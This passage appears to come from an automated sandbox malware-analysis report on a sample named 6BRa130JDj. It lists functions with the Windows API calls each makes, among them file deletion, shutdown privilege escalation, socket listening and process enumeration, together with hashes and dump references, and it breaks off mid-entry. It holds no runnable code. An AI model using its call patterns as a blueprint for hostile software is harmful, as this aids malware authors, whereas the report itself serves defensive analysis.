                                                                                                                    • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                    • String ID: *.*
                                                                                                                    • API String ID: 713712311-438819550
                                                                                                                    • Opcode ID: f07bccab4d7e58bdfbc6134f76748c95f70f6ff68f2369640a78ca75a15ee845
                                                                                                                    • Instruction ID: b062ed5ebeefe5302e212cc421019eccccbdbd3d4a4f4331253e292b8f36d988
                                                                                                                    • Opcode Fuzzy Hash: f07bccab4d7e58bdfbc6134f76748c95f70f6ff68f2369640a78ca75a15ee845
                                                                                                                    • Instruction Fuzzy Hash: 8441917190021A9FCF16EF64DC45AEEBBB8FF09310F544466E815A32A1EB309E94CF50
                                                                                                                    Function 002C3030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __itow__swprintf
                                                                                                                    • String ID: 3c,$_,
                                                                                                                    • API String ID: 674341424-370742736
                                                                                                                    • Opcode ID: e8eb4dff9e2726fb9b9a16061887991afaf1a45397cb0c00ddfc7b62926f4cb9
                                                                                                                    • Instruction ID: ac79daff6e5f1c9c9b5d867e1075662c8917131a188a67b072c9b667a6dfa288
                                                                                                                    • Opcode Fuzzy Hash: e8eb4dff9e2726fb9b9a16061887991afaf1a45397cb0c00ddfc7b62926f4cb9
                                                                                                                    • Instruction Fuzzy Hash: E0229C716283019FC724DF14C881FAEB7E4EF85350F008A2DF99A97291DB71E964CB92
                                                                                                                    Function 002C5760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4104443479-0
                                                                                                                    • Opcode ID: e0a8f3bc8dbda703bcf57ff7b1b6c37666719c8a17293a34e556724ed93e298c
                                                                                                                    • Instruction ID: 00cddc7be624f4b4e0299e47962a897a55c27e4680219f9ce23d39c5a995f58a
                                                                                                                    • Opcode Fuzzy Hash: e0a8f3bc8dbda703bcf57ff7b1b6c37666719c8a17293a34e556724ed93e298c
                                                                                                                    • Instruction Fuzzy Hash: 5C129B70A10619DFDF08DFA5C991BEEB7B9FF48300F104669E446A7290EB76AD60CB50
                                                                                                                    Function 00313B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002B4743,?,?,002B37AE,?), ref: 002B4770
                                                                                                                      • Part of subcall function 00314A31: GetFileAttributesW.KERNEL32(?,0031370B), ref: 00314A32
                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00313B89
                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 00313BD9
                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00313BEA
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00313C01
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00313C0A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                    • String ID: \*.*
                                                                                                                    • API String ID: 2649000838-1173974218
                                                                                                                    • Opcode ID: d57a1fc1483904b7126a6dc391324f8134b33e30093f9cfa76f7d87ddc5f517a
                                                                                                                    • Instruction ID: 7a1ef87e465641de52854c79a084b18964a8121f003cac6924a078a3bdf0588b
                                                                                                                    • Opcode Fuzzy Hash: d57a1fc1483904b7126a6dc391324f8134b33e30093f9cfa76f7d87ddc5f517a
                                                                                                                    • Instruction Fuzzy Hash: A1316D350183859FC206FB24C8918EFB7ACAE95354F444E2DF4D5921A1EB21DA18CBA2
                                                                                                                    Function 003151BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 003087E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0030882B
                                                                                                                      • Part of subcall function 003087E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00308858
                                                                                                                      • Part of subcall function 003087E1: GetLastError.KERNEL32 ref: 00308865
                                                                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 003151F9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                    • String ID: $@$SeShutdownPrivilege
                                                                                                                    • API String ID: 2234035333-194228
                                                                                                                    • Opcode ID: 1ed2a4c8d9b381d98538196408dde8ac2e8679d0310fed7e817c62780a443c62
                                                                                                                    • Instruction ID: 67ec2b78e08f86c66b0b6d40716394d8185b87e8cd699e632572b80f2f3a8b95
                                                                                                                    • Opcode Fuzzy Hash: 1ed2a4c8d9b381d98538196408dde8ac2e8679d0310fed7e817c62780a443c62
                                                                                                                    • Instruction Fuzzy Hash: CA012433B91605ABE72F23689C9AFFB725C9B8E740F610C20F803E60D2DA715C828190
                                                                                                                    Function 00326283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 003262DC
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 003262EB
                                                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00326307
                                                                                                                    • listen.WSOCK32(00000000,00000005), ref: 00326316
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00326330
                                                                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00326344
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1279440585-0
                                                                                                                    • Opcode ID: bafd6f9659beaaae244bafcf686967eac0032ef23887fd4653b1adf2a18a8e87
                                                                                                                    • Instruction ID: 99c3b193e910293e867b834a5ef475f70fce34d7ee0f043c43e120985f8a7a16
                                                                                                                    • Opcode Fuzzy Hash: bafd6f9659beaaae244bafcf686967eac0032ef23887fd4653b1adf2a18a8e87
                                                                                                                    • Instruction Fuzzy Hash: B121D034600210AFCB11EF64DC86A6EB7B9EF49760F558158FA16AB3E1C770AC41CB51
                                                                                                                    Function 002C5520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002D0DB6: std::exception::exception.LIBCMT ref: 002D0DEC
                                                                                                                      • Part of subcall function 002D0DB6: __CxxThrowException@8.LIBCMT ref: 002D0E01
                                                                                                                    • _memmove.LIBCMT ref: 00300258
                                                                                                                    • _memmove.LIBCMT ref: 0030036D
                                                                                                                    • _memmove.LIBCMT ref: 00300414
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1300846289-0
                                                                                                                    • Opcode ID: 718740a2c5ae928c4629137d15f71ec1fe8ac71fc93f819853353ec8673e506c
                                                                                                                    • Instruction ID: 480cfafae25d4cb1b338f25b5437d37bc8248247107e2e864d3f4ee04d4f26e6
                                                                                                                    • Opcode Fuzzy Hash: 718740a2c5ae928c4629137d15f71ec1fe8ac71fc93f819853353ec8673e506c
                                                                                                                    • Instruction Fuzzy Hash: 7702C470A10215DBCF09DF64D991BAEBBB9EF44300F5480A9E809DB395EB31ED64CB91
                                                                                                                    Function 002B1287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B2612: GetWindowLongW.USER32(?,000000EB), ref: 002B2623
                                                                                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 002B19FA
                                                                                                                    • GetSysColor.USER32(0000000F), ref: 002B1A4E
                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 002B1A61
                                                                                                                      • Part of subcall function 002B1290: DefDlgProcW.USER32(?,00000020,?), ref: 002B12D8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ColorProc$LongWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3744519093-0
                                                                                                                    • Opcode ID: d27d3cb0d5e54f56de7874c17320f398c65f2b77eb7c9c5435e6ab2b63f92a03
                                                                                                                    • Instruction ID: b44b92c88c0268c033ec226c74626c579ace7f2efd6e459ad3df3c9c5b16a032
                                                                                                                    • Opcode Fuzzy Hash: d27d3cb0d5e54f56de7874c17320f398c65f2b77eb7c9c5435e6ab2b63f92a03
                                                                                                                    • Instruction Fuzzy Hash: CBA13A711325C6BAEB3AAE294CB8EFF355CDB463C1FD40119F502D6192CA60AD70D6B1
                                                                                                                    Function 0031BCBC Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0031BCE6
                                                                                                                    • _wcscmp.LIBCMT ref: 0031BD16
                                                                                                                    • _wcscmp.LIBCMT ref: 0031BD2B
                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0031BD3C
                                                                                                                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0031BD6C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2387731787-0
                                                                                                                    • Opcode ID: 91526e35f54a89b52a3581484109af2a1b694af5eef92361900f3617780df2ea
                                                                                                                    • Instruction ID: 0cf76dd6b31d37be661ba944ed12810fc6b9ddcffc1d475ba04f57bfcf4fee57
                                                                                                                    • Opcode Fuzzy Hash: 91526e35f54a89b52a3581484109af2a1b694af5eef92361900f3617780df2ea
                                                                                                                    • Instruction Fuzzy Hash: AE517A35A046029FC719DF28D491EEAB3E8EF49324F11461DE9568B3A1DB30ED54CB91
                                                                                                                    Function 00326747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00327D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00327DB6
                                                                                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0032679E
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 003267C7
                                                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00326800
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0032680D
                                                                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00326821
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 99427753-0
                                                                                                                    • Opcode ID: c7bce5c8025b57d381f20383092b9f3810b924dca1ee28d744bec31dc7dc7baf
                                                                                                                    • Instruction ID: e33d887bf1ca9de9ef50f1ca5acc66b591dd4f7d12a0d8504c764a7028dcaa22
                                                                                                                    • Opcode Fuzzy Hash: c7bce5c8025b57d381f20383092b9f3810b924dca1ee28d744bec31dc7dc7baf
                                                                                                                    • Instruction Fuzzy Hash: 5A41C475A00210AFDB15BF249C87FAE77A8DF05794F44845CFA1AAB3D2CA709D50CB91
                                                                                                                    Function 00335376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 292994002-0
                                                                                                                    • Opcode ID: f821508c7dafae24aeb7f84f54a5e4aa24bc08e1884e5c192f775e723d8bca2c
                                                                                                                    • Instruction ID: 54f9eba9ac16a9f66ae1b46021c79cce598aeadd5eaf18a14260e52d4b28d5fe
                                                                                                                    • Opcode Fuzzy Hash: f821508c7dafae24aeb7f84f54a5e4aa24bc08e1884e5c192f775e723d8bca2c
                                                                                                                    • Instruction Fuzzy Hash: 7E11BF327009116FEB236F269CC4BAABBADEF457A1F414029F846D7251CBB0DD018AA0
                                                                                                                    Function 003080A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003080C0
                                                                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003080CA
                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003080D9
                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003080E0
                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003080F6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 44706859-0
                                                                                                                    • Opcode ID: 68a9e80d0b09539ce9dcf5ed4fd9a0180dd97b04fc161cbf2854c2882f0f2b07
                                                                                                                    • Instruction ID: 0d9a8f20ccebe15e35312283d9ce5af934be7cf5500446d8aec73726064743e5
                                                                                                                    • Opcode Fuzzy Hash: 68a9e80d0b09539ce9dcf5ed4fd9a0180dd97b04fc161cbf2854c2882f0f2b07
                                                                                                                    • Instruction Fuzzy Hash: B6F06235641204AFEB160FA5ECCDE673BACEF49755F400025F985C62A0CBA1DC45DE60
                                                                                                                    Function 002B4B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,002B4AD0), ref: 002B4B45
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 002B4B57
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                    • API String ID: 2574300362-192647395
                                                                                                                    • Opcode ID: 0d1492a1ef36ae4aa35d7e124890b5769789c0b70b9c5cb2f59d4d2e9ffbd1d5
                                                                                                                    • Instruction ID: c0906ac8660109dca31fb4d482681af7cb8645361240435c52986b437df5cd93
                                                                                                                    • Opcode Fuzzy Hash: 0d1492a1ef36ae4aa35d7e124890b5769789c0b70b9c5cb2f59d4d2e9ffbd1d5
                                                                                                                    • Instruction Fuzzy Hash: 9ED01274E10713CFDB21AF31E898B86B6D8AF05395F518839D486D6160D774D480C654
                                                                                                                    Function 0032EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0032EE3D
                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0032EE4B
                                                                                                                      • Part of subcall function 002B7DE1: _memmove.LIBCMT ref: 002B7E22
                                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 0032EF0B
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0032EF1A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2576544623-0
                                                                                                                    • Opcode ID: 8aa73557eacedf7d6d413320357fa23aef6c4efd2843c11eb9b6cc055ae40b3b
                                                                                                                    • Instruction ID: 2e83366de50a181b22664f1227587c4b691144a248b92a5bbac44a6db2b07878
                                                                                                                    • Opcode Fuzzy Hash: 8aa73557eacedf7d6d413320357fa23aef6c4efd2843c11eb9b6cc055ae40b3b
                                                                                                                    • Instruction Fuzzy Hash: 0651C071518711AFD311EF20DC82EABB7E8EF94740F40492DF595972A1EB70E918CB92
                                                                                                                    Function 0030E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0030E628
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrlen
                                                                                                                    • String ID: ($|
                                                                                                                    • API String ID: 1659193697-1631851259
                                                                                                                    • Opcode ID: c82c05bb8b7cd8ee3a6f0818df37937a3d7204e7349b6e474ddf272c7ad234ab
                                                                                                                    • Instruction ID: 3530fbe17a89de02f67a6bf4ba03dfe86b5b11a704d6685afb7aad95d36304b7
                                                                                                                    • Opcode Fuzzy Hash: c82c05bb8b7cd8ee3a6f0818df37937a3d7204e7349b6e474ddf272c7ad234ab
                                                                                                                    • Instruction Fuzzy Hash: 1D324675A017059FDB29CF19C490A6AB7F1FF48320B15C86EE89ADB7A1E770E941CB40
                                                                                                                    Function 003222EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                                                                                    Download Yara Rule
